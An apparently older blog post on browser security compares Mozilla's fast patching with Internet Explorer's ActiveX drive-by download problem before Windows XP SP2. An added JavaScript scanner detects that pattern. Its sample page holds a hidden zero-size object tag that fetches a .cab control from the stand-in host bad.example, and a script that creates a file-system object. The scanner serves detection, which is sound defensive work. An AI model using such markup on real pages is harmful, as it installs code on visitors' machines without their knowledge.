Mozilla has a history of issuing patches to Firefox and its other products within days of learning of a vulnerability. Often the patch is issued before the person who discovered the hole announces it publicly.
This is the way vulnerability disclosure should work: the discoverer gives the software vendor a chance to patch before telling the public (and the bad guys) about the hole. It is totally different from what FrSIRT (the French Security Incident Response Team) did in May 2006, when it published exploit code while Mozilla was still working with Greyhats Security Group, the discoverers, to solve the problem.
Microsoft, on the other hand, seems to let its security problems lie around and fester. After all, ActiveX is still part of Internet Explorer.
Microsoft finally put up a roadblock to ActiveX "drive-by downloads" as of Windows XP Service Pack 2, but it did not backport that protection to IE on earlier versions of Windows. IE on Windows XP SP2 is the only existing installation that got the fix; the Windows and IE releases that came after SP2 carry the same protection, but nothing before it does.
A drive-by download occurs when your browser lands on a web page that embeds an ActiveX control and tells IE where to fetch it from. If you are using IE on anything older than XP Service Pack 2, IE fetches the control and runs it, with at most a modal "install this control?" dialog that most users click straight through. As of XP SP2 the download is blocked by default and the Information Bar makes you deliberately opt in before anything is installed.
So if you are running a version of Windows before Windows XP, or Windows XP without SP2, nothing stops the drive-by download. If you need a reason to upgrade to Windows XP, this is it. Its security is far better than that of Windows 98 or Windows Me.
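The mechanism described above has a recognizable footprint in the page markup: an `<object>` tag whose `codebase` attribute points at a remote package (usually a `.cab`) is exactly the instruction that makes IE fetch and install a control, and `new ActiveXObject(...)` in script is how a page then drives controls that are already installed. As an added example (not code from the original post), here is a small JavaScript scanner that flags both patterns in raw HTML, the kind of check a proxy or mail gateway might run. The sample page, the host name `bad.example` and the all-zero CLSID are constructed placeholders for this example, not real identifiers.

```javascript
// Added example, not from the original post. Scans raw HTML for the markup
// that triggers an ActiveX "drive-by" install on pre-SP2 Internet Explorer:
//   <object classid="clsid:..." codebase="http://host/control.cab#version=...">
// and for script that instantiates controls via new ActiveXObject("ProgID").
// Assumption: the scanner sees the page source (e.g. at a proxy); it is a
// heuristic on the markup, not an emulation of the browser.

const OBJECT_TAG_RE = /<object\b([^>]*)>/gi;
const ATTR_RE = /([a-zA-Z][\w-]*)\s*=\s*("([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
const ACTIVEX_SCRIPT_RE = /new\s+ActiveXObject\s*\(\s*(["'])([^"']+)\1/gi;

// Parse the attribute text of one tag into a lowercase-keyed map.
function parseAttrs(attrText) {
  const attrs = {};
  let m;
  ATTR_RE.lastIndex = 0;
  while ((m = ATTR_RE.exec(attrText)) !== null) {
    const value = m[3] !== undefined ? m[3] : (m[4] !== undefined ? m[4] : m[5]);
    attrs[m[1].toLowerCase()] = value;
  }
  return attrs;
}

// A codebase that names a network location means IE would download the
// control rather than use one already on the machine. The "#version=..."
// suffix is the ActiveX convention for the minimum version wanted.
function isRemoteCodebase(codebase) {
  if (!codebase) return false;
  const url = codebase.split('#')[0].trim();
  return /^(https?:|ftp:|\/\/)/i.test(url);
}

// Return every <object> tag that would cause a download-and-install.
function findDriveByObjects(html) {
  const hits = [];
  let m;
  OBJECT_TAG_RE.lastIndex = 0;
  while ((m = OBJECT_TAG_RE.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    const classid = attrs.classid || '';
    const codebase = attrs.codebase || '';
    if (/^clsid:/i.test(classid) && isRemoteCodebase(codebase)) {
      hits.push({ classid, codebase: codebase.split('#')[0].trim(), offset: m.index });
    }
  }
  return hits;
}

// Return the ProgIDs that page script tries to instantiate.
function findScriptedActiveX(html) {
  const progids = [];
  let m;
  ACTIVEX_SCRIPT_RE.lastIndex = 0;
  while ((m = ACTIVEX_SCRIPT_RE.exec(html)) !== null) {
    progids.push(m[2]);
  }
  return progids;
}

function scanPage(html) {
  return {
    objects: findDriveByObjects(html),
    scriptedActiveX: findScriptedActiveX(html),
  };
}

// Constructed sample page for the example: the host is not real and the
// CLSID is an all-zero placeholder. The second <object> has no codebase, so
// it only references a control that is already installed and is not flagged.
const SAMPLE_HTML = `
<html><body>
<object classid="clsid:00000000-0000-0000-0000-000000000000"
        codebase="http://bad.example/install.cab#version=1,0,0,0"
        width="0" height="0"></object>
<object classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<script>var fso = new ActiveXObject("Scripting.FileSystemObject");</script>
</body></html>`;

console.log(JSON.stringify(scanPage(SAMPLE_HTML), null, 2));
```

The zero-size `width`/`height` on the first tag is typical of a drive-by page: the control is not meant to be seen, only installed. A real deployment would also compare flagged CLSIDs against an allow-list of controls the organization actually uses.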
Yes, I know Microsoft calls it an "ActiveX Control" and not an ActiveX Program. Some bright spin-doctor decided to use pretty, but misleading, terminology.
A rose is a rose by any other name. Anything that downloads and runs on your computer with the ability to write to your hard drive is a program, and an ActiveX control is native code that runs with the full privileges of the logged-on user, with no sandbox around it. Ever wonder how all those trojans, downloaders, adware and popup generators got on your system?
Try using Firefox or Opera as your web browser. Save Internet Explorer for the sites that genuinely need it, such as Windows Update, which requires ActiveX.